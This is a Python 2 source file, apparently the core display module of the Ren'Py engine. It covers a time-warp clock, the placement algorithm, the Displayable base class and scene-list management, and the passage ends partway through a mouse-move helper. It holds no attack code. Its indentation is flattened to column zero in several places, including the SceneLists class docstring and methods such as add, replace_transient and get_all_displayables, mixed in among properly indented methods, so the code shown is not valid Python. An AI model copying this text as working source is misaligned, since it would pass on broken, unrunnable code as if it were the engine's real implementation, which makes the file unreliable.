# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# This file contains code for initializing and managing the display
# window.
from __future__ import print_function
import renpy.display
import renpy.audio
import renpy.text
import renpy.test
import pygame_sdl2 as pygame
import sys
import os
import time
import cStringIO
import threading
import copy
import gc
import inspect
# Wall-clock time at which this module was imported; useful for measuring
# startup cost.
import_time = time.time()
# `android` is only present when running under the Android port.
# NOTE(review): bare except also hides non-ImportError failures - confirm intended.
try:
    import android # @UnresolvedImport
except:
    android = None
# Custom event types registered with pygame_sdl2.
TIMEEVENT = pygame.event.register("TIMEEVENT")
PERIODIC = pygame.event.register("PERIODIC")
REDRAW = pygame.event.register("REDRAW")
EVENTNAME = pygame.event.register("EVENTNAME")
# All events except for TIMEEVENT and REDRAW
ALL_EVENTS = set(pygame.event.get_standard_events()) # @UndefinedVariable
ALL_EVENTS.add(PERIODIC)
ALL_EVENTS.add(EVENTNAME)
# The event types that the event queue will deliver.
enabled_events = {
    pygame.QUIT,
    pygame.APP_TERMINATING,
    pygame.APP_LOWMEMORY,
    pygame.APP_WILLENTERBACKGROUND,
    pygame.APP_DIDENTERBACKGROUND,
    pygame.APP_WILLENTERFOREGROUND,
    pygame.APP_DIDENTERFOREGROUND,
    pygame.WINDOWEVENT,
    pygame.SYSWMEVENT,
    pygame.KEYDOWN,
    pygame.KEYUP,
    pygame.TEXTEDITING,
    pygame.TEXTINPUT,
    pygame.MOUSEMOTION,
    pygame.MOUSEBUTTONDOWN,
    pygame.MOUSEBUTTONUP,
    pygame.MOUSEWHEEL,
    pygame.JOYAXISMOTION,
    pygame.JOYHATMOTION,
    pygame.JOYBALLMOTION,
    pygame.JOYBUTTONDOWN,
    pygame.JOYBUTTONUP,
    pygame.JOYDEVICEADDED,
    pygame.JOYDEVICEREMOVED,
    pygame.CONTROLLERAXISMOTION,
    pygame.CONTROLLERBUTTONDOWN,
    pygame.CONTROLLERBUTTONUP,
    pygame.CONTROLLERDEVICEADDED,
    pygame.CONTROLLERDEVICEREMOVED,
    pygame.RENDER_TARGETS_RESET,
    TIMEEVENT,
    PERIODIC,
    REDRAW,
    EVENTNAME,
}
# The number of msec between periodic events.
PERIODIC_INTERVAL = 50
# Time management. `time_base` and `time_mult` implement the RENPY_TIMEWARP
# scaled clock - see init_time() and get_time().
time_base = 0.0
time_mult = 1.0
def init_time():
    """
    Initialize the warped clock used by get_time(). The RENPY_TIMEWARP
    environment variable scales the passage of time (default 1.0).
    """

    global time_base, time_mult

    time_base = time.time()
    time_mult = float(os.environ.get("RENPY_TIMEWARP", "1.0"))
def get_time():
    """
    Return the current time, with elapsed time since init_time() scaled
    by the RENPY_TIMEWARP factor.
    """
    now = time.time()
    return time_base + (now - time_base) * time_mult
def displayable_by_tag(layer, tag):
    """
    Get the displayable on the given layer with the given tag.
    """

    scene_lists = renpy.game.context().scene_lists
    return scene_lists.get_displayable_by_tag(layer, tag)
class IgnoreEvent(Exception):
    """
    Raised to swallow an event when we do not want to return any value
    from the interaction.
    """
class EndInteraction(Exception):
    """
    Raised (for example, inside a displayable's render method) to end the
    current interaction immediately, with `value` as its result.
    """

    def __init__(self, value):
        # Stored for the interaction loop to pick up as the return value.
        self.value = value
class absolute(float):
    """
    A float subclass marking a coordinate as absolute (pixels) rather
    than relative - see place(), which tests for exactly-float values.
    """

    __slots__ = [ ]
def place(width, height, sw, sh, placement):
    """
    Performs the Ren'Py placement algorithm.

    `width`, `height`
        The width and height of the area the image will be
        placed in.

    `sw`, `sh`
        The width and height of the image to be placed.

    `placement`
        The tuple returned by Displayable.get_placement().
    """

    xpos, ypos, xanchor, yanchor, xoffset, yoffset, _subpixel = placement

    # Treat missing components as zero.
    xpos = 0 if xpos is None else xpos
    ypos = 0 if ypos is None else ypos
    xanchor = 0 if xanchor is None else xanchor
    yanchor = 0 if yanchor is None else yanchor
    xoffset = 0 if xoffset is None else xoffset
    yoffset = 0 if yoffset is None else yoffset

    # Exact type checks (not isinstance) deliberately distinguish a plain
    # float (relative fraction, scaled) from `absolute` (a float subclass,
    # taken as pixels).
    if xpos.__class__ is float:
        xpos *= width
    if xanchor.__class__ is float:
        xanchor *= sw

    if ypos.__class__ is float:
        ypos *= height
    if yanchor.__class__ is float:
        yanchor *= sh

    x = xpos + xoffset - xanchor
    y = ypos + yoffset - yanchor

    return x, y
class DisplayableArguments(renpy.object.Object):
    """
    Represents a set of arguments that can be passed to a duplicated
    displayable.
    """

    # The name of the displayable without any arguments.
    name = ()

    # Arguments supplied.
    args = ()

    # The style prefix in play. This is used by DynamicImage to figure
    # out the prefix list to apply.
    prefix = None

    # True if lint is in use.
    lint = False

    def copy(self, **kwargs):
        """
        Returns a copy of this object, with fields overridden by the
        keyword arguments.
        """

        duplicate = DisplayableArguments()
        duplicate.__dict__.update(self.__dict__)
        duplicate.__dict__.update(kwargs)
        return duplicate

    def extraneous(self):
        # In developer mode, unconsumed image attributes are an error.
        if renpy.config.developer and renpy.config.report_extraneous_attributes:
            raise Exception("Image '{}' does not accept attributes '{}'.".format(
                " ".join(self.name),
                " ".join(self.args),
            ))
# A single shared Style object handed to every Displayable constructed with
# style='default' and no extra properties, to avoid allocating one per widget.
default_style = renpy.style.Style("default")
class Displayable(renpy.object.Object):
    """
    The base class for every object in Ren'Py that can be
    displayed to the screen.
    Drawables will be serialized to a savegame file. Therefore, they
    shouldn't store non-serializable things (like pygame surfaces) in
    their fields.
    """
    # Some invariants about method call order:
    #
    # per_interact is called before render.
    # render is called before event.
    #
    # get_placement can be called at any time, so can't
    # assume anything.
    # If True this displayable can accept focus.
    # If False, it can't, but it keeps its place in the focus order.
    # If None, it does not have a place in the focus order.
    focusable = None
    # This is the focus name assigned by the focus code.
    full_focus_name = None
    # A role ('selected_' or '') that prefixes the style.
    role = ''
    # The event we'll pass on to our parent transform.
    transform_event = None
    # Can we change our look in response to transform_events?
    transform_event_responder = False
    # The main displayable, if this displayable is the root of a composite
    # displayable. (This is used by SL to figure out where to add children
    # to.) If None, it is itself.
    _main = None
    # A list of the children that make up this composite displayable.
    _composite_parts = [ ]
    # The location the displayable was created at, if known.
    _location = None
    # Does this displayable use the scope?
    _uses_scope = False
    # Arguments supplied to this displayable.
    _args = DisplayableArguments()
    # Set to true if the displayable is duplicatable (has a non-trivial
    # duplicate method), or one of its children is.
    _duplicatable = False
    # Does this displayable require clipping?
    _clipping = False
    # Does this displayable have a tooltip?
    _tooltip = None
    def __ne__(self, o):
        # Defined in terms of __eq__, so subclasses only override __eq__.
        return not (self == o)
    def __init__(self, focus=None, default=False, style='default', _args=None, tooltip=None, default_focus=False, **properties):
        global default_style
        # Share the module-level default_style object between all
        # displayables that use the default style with no extra properties.
        if (style == "default") and (not properties):
            self.style = default_style
        else:
            self.style = renpy.style.Style(style, properties) # @UndefinedVariable
        self.focus_name = focus
        self.default = default or default_focus
        self._tooltip = tooltip
        if _args is not None:
            self._args = _args
    def _copy(self, args=None):
        """
        Makes a shallow copy of the displayable. If `args` is provided,
        replaces the arguments with the stored copy.
        """
        rv = copy.copy(self)
        if args is not None:
            rv._args = args
        return rv
    def _duplicate(self, args):
        """
        Makes a duplicate copy of the following kinds of displayables:
        * Displayables that can accept arguments.
        * Displayables that maintain state that should be reset before being
        shown to the user.
        * Containers that contain (including transitively) one of the other
        kinds of displayables.
        Displayables that contain state that can be manipulated by the user
        are never copied.
        This should call _unique on children that have been copied before
        setting its own _duplicatable flag.
        """
        if args and args.args:
            args.extraneous()
        return self
    def _get_tooltip(self):
        """
        Returns the tooltip of this displayable.
        """
        return self._tooltip
    def _in_current_store(self):
        """
        Returns a version of this displayable that will not change as it is
        rendered.
        """
        return self
    def _unique(self):
        """
        This is called when a displayable is "born" unique, which occurs
        when there is only a single reference to it. What it does is to
        manage the _duplicatable flag - setting it false unless one of
        the displayable's children happens to be duplicatable.
        """
        return
    def parameterize(self, name, parameters):
        """
        Obsolete alias for _duplicate.
        """
        a = self._args.copy(name=name, args=parameters)
        return self._duplicate(a)
    def _equals(self, o):
        """
        This is a utility method that can be called by a Displayable's
        __eq__ method, to compare displayables for type and displayable
        component equality.
        """
        if type(self) is not type(o):
            return False
        if self.focus_name != o.focus_name:
            return False
        if self.style != o.style:
            return False
        if self.default != o.default:
            return False
        return True
    def __unicode__(self):
        # Human-readable class name; __repr__ builds on this.
        return self.__class__.__name__
    def __repr__(self):
        return "<{} at {:x}>".format(unicode(self).encode("utf-8"), id(self))
    def find_focusable(self, callback, focus_name):
        # Reports this displayable (and, recursively, its children) to the
        # focus system. A focusable=False displayable reserves a slot in
        # the focus order without being focusable itself.
        focus_name = self.focus_name or focus_name
        if self.focusable:
            callback(self, focus_name)
        elif self.focusable is not None:
            callback(None, focus_name)
        for i in self.visit():
            if i is None:
                continue
            i.find_focusable(callback, focus_name)
    def focus(self, default=False):
        """
        Called to indicate that this widget has the focus.
        """
        self.set_style_prefix(self.role + "hover_", True)
        # Don't play the hover sound when focus was assigned by default.
        if not default:
            renpy.exports.play(self.style.hover_sound)
    def unfocus(self, default=False):
        """
        Called to indicate that this widget has become unfocused.
        """
        self.set_style_prefix(self.role + "idle_", True)
    def is_focused(self):
        # While a focus grab is in effect, only the grabbing displayable
        # counts as focused.
        if renpy.display.focus.grab and renpy.display.focus.grab is not self:
            return
        return renpy.game.context().scene_lists.focused is self
    def set_style_prefix(self, prefix, root):
        """
        Called to set the style prefix of this widget and its child
        widgets, if any.
        `root` - True if this is the root of a style tree, False if this
        has been passed on to a child.
        """
        if prefix == self.style.prefix:
            return
        self.style.set_prefix(prefix)
        renpy.display.render.redraw(self, 0)
    def render(self, width, height, st, at):
        """
        Called to display this displayable. This is called with width
        and height parameters, which give the largest width and height
        that this drawable can be drawn to without overflowing some
        bounding box. It's also given two times. It returns a Surface
        that is the current image of this drawable.
        @param st: The time since this widget was first shown, in seconds.
        @param at: The time since a similarly named widget was first shown,
        in seconds.
        """
        raise Exception("Render not implemented.")
    def event(self, ev, x, y, st):
        """
        Called to report that an event has occured. Ev is the raw
        pygame event object representing that event. If the event
        involves the mouse, x and y are the translation of the event
        into the coordinates of this displayable. st is the time this
        widget has been shown for.
        @returns A value that should be returned from Interact, or None if
        no value is appropriate.
        """
        return None
    def get_placement(self):
        """
        Returns a style object containing placement information for
        this Displayable. Children are expected to overload this
        to return something more sensible.
        """
        return self.style.get_placement()
    def visit_all(self, callback, seen=None):
        """
        Calls the callback on this displayable, and then on all children
        of this displayable.
        """
        if seen is None:
            seen = set()
        for d in self.visit():
            if d is None:
                continue
            # Track visited ids so shared children are only visited once.
            id_d = id(d)
            if id_d in seen:
                continue
            seen.add(id_d)
            d.visit_all(callback, seen)
        callback(self)
    def visit(self):
        """
        Called to ask the displayable to return a list of its children
        (including children taken from styles). For convenience, this
        list may also include None values.
        """
        return [ ]
    def per_interact(self):
        """
        Called once per widget per interaction.
        """
        return None
    def predict_one(self):
        """
        Called to ask this displayable to call the callback with all
        the images it may want to load.
        """
        return
    def predict_one_action(self):
        """
        Called to ask this displayable to cause image prediction
        to occur for images that may be loaded by its actions.
        """
        return
    def place(self, dest, x, y, width, height, surf, main=True):
        """
        This places a render (which must be of this displayable)
        within a bounding area. Returns an (x, y) tuple giving the location
        the displayable was placed at.
        `dest`
            If not None, the `surf` will be blitted to `dest` at the
            computed coordinates.
        `x`, `y`, `width`, `height`
            The bounding area.
        `surf`
            The render to place.
        `main`
            This is passed to Render.blit().
        """
        placement = self.get_placement()
        subpixel = placement[6]
        xpos, ypos = place(width, height, surf.width, surf.height, placement)
        xpos += x
        ypos += y
        pos = (xpos, ypos)
        if dest is not None:
            if subpixel:
                dest.subpixel_blit(surf, pos, main, main, None)
            else:
                dest.blit(surf, pos, main, main, None)
        return pos
    def set_transform_event(self, event):
        """
        Sets the transform event of this displayable to event.
        """
        if event == self.transform_event:
            return
        self.transform_event = event
        # Only responders need a redraw when the event changes.
        if self.transform_event_responder:
            renpy.display.render.redraw(self, 0)
    def _handles_event(self, event):
        """
        Returns True if the displayable handles event, False otherwise.
        """
        return False
    def _hide(self, st, at, kind):
        """
        Returns None if this displayable is ready to be hidden, or
        a replacement displayable if it doesn't want to be hidden
        quite yet. Kind is either "hide" or "replaced".
        """
        return None
    def _show(self):
        """
        Called when the displayable is added to a scene list.
        """
    def _target(self):
        """
        If this displayable is part of a chain of one or more references,
        returns the ultimate target of those references. Otherwise, returns
        the displayable.
        """
        return self
    def _change_transform_child(self, child):
        """
        If this is a transform, makes a copy of the transform and sets
        the child of the innermost transform to this. Otherwise,
        simply returns child.
        """
        return child
    def _clear(self):
        """
        Clears out the children of this displayable, if any.
        """
        return
    def _tts_common(self, default_alt=None):
        # Collect the self-voicing text of the children, join it with
        # colons, then optionally substitute it into the style's alt text.
        rv = [ ]
        for i in self.visit():
            if i is not None:
                speech = i._tts()
                if speech.strip():
                    rv.append(speech)
        rv = ": ".join(rv)
        rv = rv.replace("::", ":")
        rv = rv.replace(": :", ":")
        alt = self.style.alt
        if alt is None:
            alt = default_alt
        if alt is not None:
            rv = renpy.substitutions.substitute(alt, scope={ "text" : rv })[0]
        return rv
    def _tts(self):
        """
        Returns the self-voicing text of this displayable and all of its
        children that cannot take focus. If the displayable can take focus,
        returns the empty string.
        """
        return self._tts_common()
    def _tts_all(self):
        """
        Returns the self-voicing text of this displayable and all of its
        children that cannot take focus.
        """
        return self._tts_common()
class SceneListEntry(renpy.object.Object):
    """
    Represents a scene list entry. Since this was replacing a tuple,
    it should be treated as immutable after its initial creation.
    """

    def __init__(self, tag, zorder, show_time, animation_time, displayable, name):
        self.tag = tag
        self.zorder = zorder
        self.show_time = show_time
        self.animation_time = animation_time
        self.displayable = displayable
        self.name = name

    def _as_tuple(self):
        # The legacy tuple layout; `name` is deliberately excluded so
        # iteration and indexing stay compatible with the old tuples.
        return (self.tag, self.zorder, self.show_time, self.animation_time, self.displayable)

    def __iter__(self):
        return iter(self._as_tuple())

    def __getitem__(self, index):
        return self._as_tuple()[index]

    def __repr__(self):
        return "<SLE: %r %r %r>" % (self.tag, self.name, self.displayable)

    def copy(self):
        return SceneListEntry(
            self.tag,
            self.zorder,
            self.show_time,
            self.animation_time,
            self.displayable,
            self.name)

    def update_time(self, time):
        # Nothing to do when both times are already set.
        if self.show_time is not None and self.animation_time is not None:
            return self

        updated = self.copy()
        updated.show_time = updated.show_time or time
        updated.animation_time = updated.animation_time or time
        return updated
class SceneLists(renpy.object.Object):
"""
This stores the current scene lists that are being used to display
things to the user.
"""
__version__ = 7
def after_setstate(self):
for i in renpy.config.layers + renpy.config.top_layers:
if i not in self.layers:
self.layers[i] = [ ]
self.at_list[i] = { }
self.layer_at_list[i] = (None, [ ])
    def after_upgrade(self, version):
        # Incremental migrations applied when unpickling a SceneLists saved
        # by an older Ren'Py (see __version__).
        if version < 1:
            # v1 introduced the per-layer at-lists.
            self.at_list = { }
            self.layer_at_list = { }
            for i in renpy.config.layers + renpy.config.top_layers:
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
        if version < 3:
            self.shown_window = False
        if version < 4:
            # v4 replaced raw tuples with SceneListEntry objects (name=None).
            for k in self.layers:
                self.layers[k] = [ SceneListEntry(*(i + (None,)) ) for i in self.layers[k] ]
            self.additional_transient = [ ]
        if version < 5:
            self.drag_group = None
        if version < 6:
            self.shown = self.image_predict_info
        if version < 7:
            self.layer_transform = { }
    def __init__(self, oldsl, shown):
        """
        Creates a new set of scene lists. If `oldsl` is given, the master
        display lists (and related per-layer state) are copied from it and
        the transient layers are cleared.
        """
        super(SceneLists, self).__init__()
        # Has a window been shown as part of these scene lists?
        self.shown_window = False
        # A map from layer name -> list(SceneListEntry)
        self.layers = { }
        # A map from layer name -> tag -> at_list associated with that tag.
        self.at_list = { }
        # A map from layer to (start time, at_list), where the at list has
        # been applied to the layer as a whole.
        self.layer_at_list = { }
        # The currently shown images.
        self.shown = shown
        # A list of (layer, tag) pairs that are considered to be
        # transient.
        self.additional_transient = [ ]
        # Either None, or a DragGroup that's used as the default for
        # drags with names.
        self.drag_group = None
        # A map from a layer to the transform that applies to that
        # layer.
        self.layer_transform = { }
        if oldsl:
            # Copy the per-layer state from the old scene lists, falling
            # back to empty state for layers the old lists didn't have.
            for i in renpy.config.layers + renpy.config.top_layers:
                try:
                    self.layers[i] = oldsl.layers[i][:]
                except KeyError:
                    self.layers[i] = [ ]
                if i in oldsl.at_list:
                    self.at_list[i] = oldsl.at_list[i].copy()
                    self.layer_at_list[i] = oldsl.layer_at_list[i]
                else:
                    self.at_list[i] = { }
                    self.layer_at_list[i] = (None, [ ])
            # Overlay layers are rebuilt each interaction, so start empty.
            for i in renpy.config.overlay_layers:
                self.clear(i)
            self.replace_transient(prefix=None)
            self.focused = None
            self.drag_group = oldsl.drag_group
            self.layer_transform.update(oldsl.layer_transform)
        else:
            for i in renpy.config.layers + renpy.config.top_layers:
                self.layers[i] = [ ]
                self.at_list[i] = { }
                self.layer_at_list[i] = (None, [ ])
            self.music = None
            self.focused = None
def replace_transient(self, prefix="hide"):
"""
Replaces the contents of the transient display list with
a copy of the master display list. This is used after a
scene is displayed to get rid of transitions and interface
elements.
`prefix`
The prefix/event to use. Set this to None to prevent the hide
from happening.
"""
for i in renpy.config.transient_layers:
self.clear(i, True)
for layer, tag in self.additional_transient:
self.remove(layer, tag, prefix=prefix)
self.additional_transient = [ ]
def transient_is_empty(self):
"""
This returns True if all transient layers are empty. This is
used by the rollback code, as we can't start a new rollback
if there is something in a transient layer (as things in the
transient layer may contain objects that cannot be pickled,
like lambdas.)
"""
for i in renpy.config.transient_layers:
if self.layers[i]:
return False
return True
    def transform_state(self, old_thing, new_thing, execution=False):
        """
        If the old thing is a transform, then move the state of that transform
        to the new thing.

        `execution`
            If true, the transform's execution state (position in its ATL
            program) is carried over as well.
        """
        if old_thing is None:
            return new_thing
        # Don't bother wrapping screens, as they can't be transformed.
        if isinstance(new_thing, renpy.display.screen.ScreenDisplayable):
            return new_thing
        if renpy.config.take_state_from_target:
            old_transform = old_thing._target()
        else:
            old_transform = old_thing
        # Nothing to carry over unless the old displayable is a Transform.
        if not isinstance(old_transform, renpy.display.motion.Transform):
            return new_thing
        if renpy.config.take_state_from_target:
            new_transform = new_thing._target()
        else:
            new_transform = new_thing
        # Wrap the new displayable in a Transform if needed, so there is
        # somewhere to copy the old state to.
        if not isinstance(new_transform, renpy.display.motion.Transform):
            new_thing = new_transform = renpy.display.motion.Transform(child=new_thing)
        new_transform.take_state(old_transform)
        if execution:
            new_transform.take_execution_state(old_transform)
        return new_thing
    def find_index(self, layer, tag, zorder, behind):
        """
        This finds the spot in the named layer where we should insert the
        displayable. It returns two things: an index at which the new thing
        should be added, and an index at which the old thing should be hidden.
        (Note that the indexes are relative to the current state of the list,
        which may change on an add or remove.)
        """
        add_index = None
        remove_index = None
        # First pass: find the entry being replaced (same tag, or the same
        # displayable used as a tag), and inherit its zorder if none given.
        for i, sle in enumerate(self.layers[layer]):
            if remove_index is None:
                if (sle.tag and sle.tag == tag) or sle.displayable == tag:
                    remove_index = i
                    if zorder is None:
                        zorder = sle.zorder
        # Fall back to the configured zorder for the tag, defaulting to 0.
        if zorder is None:
            zorder = renpy.config.tag_zorder.get(tag, 0)
        # Second pass: insert before the first entry with a greater zorder,
        # or before a same-zorder entry we must stay behind.
        for i, sle in enumerate(self.layers[layer]):
            if add_index is None:
                if sle.zorder == zorder:
                    if sle.tag and (sle.tag == tag or sle.tag in behind):
                        add_index = i
                elif sle.zorder > zorder:
                    add_index = i
        if add_index is None:
            add_index = len(self.layers[layer])
        return add_index, remove_index, zorder
def add(self,
layer,
thing,
key=None,
zorder=0,
behind=[ ],
at_list=[ ],
name=None,
atl=None,
default_transform=None,
transient=False,
keep_st=False):
"""
Adds something to this scene list. Some of these names are quite a bit
out of date.
`thing` - The displayable to add.
`key` - A string giving the tag associated with this thing.
`zorder` - Where to place this thing in the zorder, an integer
A greater value means closer to the user.
`behind` - A list of tags to place the thing behind.
`at_list` - The at_list associated with this
displayable. Counterintunitively, this is not actually
applied, but merely stored for future use.
`name` - The full name of the image being displayed. This is used for
image lookup.
`atl` - If not None, an atl block applied to the thing. (This actually is
applied here.)
`default_transform` - The default transform that is used to initialized
the values in the other transforms.
`keep_st`
If true, we preserve the shown time of a replaced displayable.
"""
if not isinstance(thing, Displayable):
raise Exception("Attempting to show something that isn't a displayable:" + repr(thing))
if layer not in self.layers:
raise Exception("Trying to add something to non-existent layer '%s'." % layer)
if key:
self.remove_hide_replaced(layer, key)
self.at_list[layer][key] = at_list
if key and name:
self.shown.predict_show(layer, name)
if transient:
self.additional_transient.append((layer, key))
l = self.layers[layer]
if atl:
thing = renpy.display.motion.ATLTransform(atl, child=thing)
add_index, remove_index, zorder = self.find_index(layer, key, zorder, behind)
at = None
st = None
if remove_index is not None:
sle = l[remove_index]
old = sle.displayable
at = sle.animation_time
if keep_st:
st = sle.show_time
if (not atl and
not at_list and
renpy.config.keep_running_transform and
isinstance(old, renpy.display.motion.Transform)):
thing = sle.displayable._change_transform_child(thing)
else:
thing = self.transform_state(l[remove_index].displayable, thing)
thing.set_transform_event("replace")
thing._show()
else:
if not isinstance(thing, renpy.display.motion.Transform):
thing = self.transform_state(default_transform, thing)
thing.set_transform_event("show")
thing._show()
sle = SceneListEntry(key, zorder, st, at, thing, name)
l.insert(add_index, sle)
if remove_index is not None:
if add_index <= remove_index:
remove_index += 1
self.hide_or_replace(layer, remove_index, "replaced")
    def hide_or_replace(self, layer, index, prefix):
        """
        Hides or replaces the scene list entry at the given
        index. `prefix` is a prefix that is used if the entry
        decides it doesn't want to be hidden quite yet.
        """

        if index is None:
            return

        l = self.layers[layer]
        oldsle = l[index]

        now = get_time()

        # Fall back to "now" when the entry never recorded its times.
        st = oldsle.show_time or now
        at = oldsle.animation_time or now

        if renpy.config.fast_unhandled_event:
            # Skip the _hide protocol entirely when the displayable doesn't
            # handle this event - it will be removed immediately below.
            if not oldsle.displayable._handles_event(prefix):
                prefix = None

        if (prefix is not None) and oldsle.tag:

            d = oldsle.displayable._hide(now - st, now - at, prefix)

            # _hide can mutate the layers, so we need to recompute
            # index.
            index = l.index(oldsle)

            if d is not None:

                # The displayable wants to stay alive (e.g. to animate out);
                # keep it under a "prefix$tag" pseudo-tag until it is done.
                sle = SceneListEntry(
                    prefix + "$" + oldsle.tag,
                    oldsle.zorder,
                    st,
                    at,
                    d,
                    None)
                l[index] = sle

                return

        # Either no hide protocol applied, or the displayable is done.
        l.pop(index)
def get_all_displayables(self):
"""
Gets all displayables reachable from this scene list.
"""
rv = [ ]
for l in self.layers.itervalues():
for sle in l:
rv.append(sle.displayable)
return rv
    def remove_above(self, layer, thing):
        """
        Removes everything on the layer that is closer to the user
        than thing, which may be either a tag or a displayable. Thing must
        be displayed, or everything will be removed.
        """

        # Iterate from the top (closest to the user) downward, in reverse
        # index order so hide_or_replace removing entries doesn't invalidate
        # the indexes we have yet to visit.
        for i in reversed(xrange(len(self.layers[layer]))):

            sle = self.layers[layer][i]

            if thing:
                if sle.tag == thing or sle.displayable == thing:
                    break

            # Leave entries that are already hiding/being replaced alone.
            if sle.tag and "$" in sle.tag:
                continue

            self.hide_or_replace(layer, i, "hide")
    def remove(self, layer, thing, prefix="hide"):
        """
        Thing is either a key or a displayable. This iterates through the
        named layer, searching for entries matching the thing.
        When they are found, they are removed from the displaylist.

        It's not an error to remove something that isn't in the layer in
        the first place.
        """

        if layer not in self.layers:
            raise Exception("Trying to remove something from non-existent layer '%s'." % layer)

        # Reuse find_index's matching logic; only the remove index matters.
        _add_index, remove_index, _zorder = self.find_index(layer, thing, 0, [ ])

        if remove_index is not None:
            tag = self.layers[layer][remove_index].tag

            if tag:
                # Update prediction info and drop the stored at-list.
                self.shown.predict_hide(layer, (tag,))
                self.at_list[layer].pop(tag, None)

            self.hide_or_replace(layer, remove_index, prefix)
    def clear(self, layer, hide=False):
        """
        Clears the named layer, making it empty.

        If hide is True, then objects are hidden. Otherwise, they are
        totally wiped out.
        """

        if layer not in self.layers:
            return

        if not hide:
            self.layers[layer] = [ ]

        else:

            # Have to iterate in reverse order, since otherwise
            # the indexes might change.
            for i in reversed(xrange(len(self.layers[layer]))):
                # NOTE(review): `hide` is forwarded as the event prefix here,
                # and hide_or_replace concatenates it with "$" - so callers
                # taking this path presumably pass a prefix string rather
                # than True. Confirm against call sites.
                self.hide_or_replace(layer, i, hide)

        self.at_list[layer].clear()
        self.shown.predict_scene(layer)
        self.layer_at_list[layer] = (None, [ ])
def set_layer_at_list(self, layer, at_list, reset=True):
self.layer_at_list[layer] = (None, list(at_list))
if reset:
self.layer_transform[layer] = None
def set_times(self, time):
"""
This finds entries with a time of None, and replaces that
time with the given time.
"""
for l, (t, list) in self.layer_at_list.items(): # @ReservedAssignment
self.layer_at_list[l] = (t or time, list)
for l, ll in self.layers.iteritems():
self.layers[l] = [ i.update_time(time) for i in ll ]
def showing(self, layer, name):
"""
Returns true if something with the prefix of the given name
is found in the scene list.
"""
return self.shown.showing(layer, name)
def get_showing_tags(self, layer):
return self.shown.get_showing_tags(layer)
def get_sorted_tags(self, layer):
rv = [ ]
for sle in self.layers[layer]:
if not sle.tag:
continue
if "$" in sle.tag:
continue
rv.append(sle.tag)
return rv
    def make_layer(self, layer, properties):
        """
        Creates a Fixed with the given layer name and scene_list.
        """

        rv = renpy.display.layout.MultiBox(layout='fixed', focus=layer, **properties)
        rv.append_scene_list(self.layers[layer])
        rv.layer_name = layer
        rv._duplicatable = False

        time, at_list = self.layer_at_list[layer]

        old_transform = self.layer_transform.get(layer, None)
        new_transform = None

        if at_list:

            # Apply each at-list entry; Transforms wrap as children, other
            # callables are applied directly.
            for a in at_list:

                if isinstance(a, renpy.display.motion.Transform):
                    rv = a(child=rv)

                    # The at-list can contain multiple transforms, so this
                    # ends up being the last transform applied.
                    new_transform = rv
                else:
                    rv = a(rv)

            if (new_transform is not None) and (renpy.config.keep_show_layer_state):
                # Carry the previous layer transform's state (including
                # execution state) into the new transform.
                self.transform_state(old_transform, new_transform, execution=True)

            # Wrap in a timebase-carrying Fixed.
            f = renpy.display.layout.MultiBox(layout='fixed')
            f.add(rv, time, time)
            f.layer_name = layer

            rv = f

        self.layer_transform[layer] = new_transform

        return rv
def remove_hide_replaced(self, layer, tag):
"""
Removes things that are hiding or replaced, that have the given
tag.
"""
hide_tag = "hide$" + tag
replaced_tag = "replaced$" + tag
l = self.layers[layer]
self.layers[layer] = [ i for i in l if i.tag != hide_tag and i.tag != replaced_tag ]
def remove_hidden(self):
"""
Goes through all of the layers, and removes things that are
hidden and are no longer being kept alive by their hide
methods.
"""
now = get_time()
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if sle.tag.startswith("hide$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "hide")
if not d:
continue
elif sle.tag.startswith("replaced$"):
d = sle.displayable._hide(now - sle.show_time, now - sle.animation_time, "replaced")
if not d:
continue
newl.append(sle)
self.layers[l] = newl
def remove_all_hidden(self):
"""
Removes everything hidden, even if it's not time yet. (Used when making a rollback copy).
"""
for l in self.layers:
newl = [ ]
for sle in self.layers[l]:
if sle.tag:
if "$" in sle.tag:
continue
newl.append(sle)
self.layers[l] = newl
def get_displayable_by_tag(self, layer, tag):
"""
Returns the displayable on the layer with the given tag, or None
if no such displayable exists. Note that this will usually return
a Transform.
"""
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.tag == tag:
return sle.displayable
return None
def get_displayable_by_name(self, layer, name):
"""
Returns the displayable on the layer with the given name, or None
if no such displayable exists. Note that this will usually return
a Transform.
"""
if layer not in self.layers:
raise Exception("Unknown layer %r." % layer)
for sle in self.layers[layer]:
if sle.name == name:
return sle.displayable
return None
    def get_image_bounds(self, layer, tag, width, height):
        """
        Implements renpy.get_image_bounds().

        Returns an (x, y, width, height) tuple for the image with `tag` on
        `layer`, rendered into a `width` x `height` area, or None if the tag
        is not shown.
        """

        if layer not in self.layers:
            raise Exception("Unknown layer %r." % layer)

        for sle in self.layers[layer]:
            if sle.tag == tag:
                break
        else:
            # Tag not found on the layer.
            return None

        now = get_time()

        # Shown/animation times default to 0 when never recorded.
        if sle.show_time is not None:
            st = now - sle.show_time
        else:
            st = 0

        if sle.animation_time is not None:
            at = now - sle.animation_time
        else:
            at = 0

        surf = renpy.display.render.render_for_size(sle.displayable, width, height, st, at)

        sw = surf.width
        sh = surf.height

        x, y = place(width, height, sw, sh, sle.displayable.get_placement())

        return (x, y, sw, sh)
def scene_lists(index=-1):
    """
    Returns either the current scenelists object, or the one for the
    context at the given index.
    """

    context = renpy.game.context(index)
    return context.scene_lists
class MouseMove(object):
    """
    This contains information about the current mouse move: it interpolates
    the pointer from its position at construction time to (x, y) over
    `duration` seconds.
    """

    def __init__(self, x, y, duration):
        self.start = get_time()
        self.duration = duration if duration is not None else 0

        self.start_x, self.start_y = renpy.display.draw.get_mouse_pos()

        self.end_x = x
        self.end_y = y

    def perform(self):
        """
        Performs the mouse move. Returns True if this should be called
        again, or False if the move has finished.
        """

        elapsed = get_time() - self.start

        # Snap to the final position once the duration has elapsed. (This
        # also covers duration == 0, avoiding the division below.)
        if elapsed >= self.duration:
            renpy.display.draw.set_mouse_pos(self.end_x, self.end_y)
            return False

        fraction = 1.0 * elapsed / self.duration

        new_x = int(self.start_x + fraction * (self.end_x - self.start_x))
        new_y = int(self.start_y + fraction * (self.end_y - self.start_y))

